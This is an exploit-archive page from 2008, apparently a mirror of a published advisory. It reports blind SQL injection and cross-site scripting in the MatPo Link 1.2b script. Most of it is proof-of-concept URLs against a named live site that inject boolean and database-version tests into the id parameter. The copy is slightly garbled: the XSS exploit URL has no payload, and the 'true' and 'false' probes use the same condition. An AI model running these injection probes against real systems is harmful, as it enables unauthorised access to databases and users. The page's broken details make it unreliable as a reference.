[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MatPo Link 1.2b (Blind SQL Injection/XSS) Multiple Vulnerabilities
# Published : 2008-11-03
# Author : Hakxer
# Previous Title : Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability
# Next Title : pppBlog <= 0.3.11 (randompic.php) File Disclosure Vulnerability


###########################################################################
      ______    __  __   ______          __                ______                   
     / ____/___  / /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
    / __/ / __ `/  /  / /   / __ / __  / _ / ___/ ___/  / / / _ / __ `/ __ `__ 
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/__, / /_/   ____/____/__,_/___/_/  /____/  /_/  ___/__,_/_/ /_/ /_/ 
        /____/       EgY Coders Vulnerability Research TM                                    

# [~] Discovered by : Hakxer
# [~] Type Gap : Blind Sql inj / XSS
# [~] Script :MatPo Link 1.2b
# [~] Greetz : Allah , Egyptian x hacker , Br1ght D@rk 
##########################################################################

|| Blind Sql Inj ||
 POC: http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+[BSQL]
  Exploit :
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 False
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 True 
  
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=5 True
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=4 False
		
|| Cross Site Scripting ||
Poc:
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=[XSS]
Exploit
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=

#  Proud To be a Muslim #
#_=END=_#

# www.Syue.com [2008-11-03]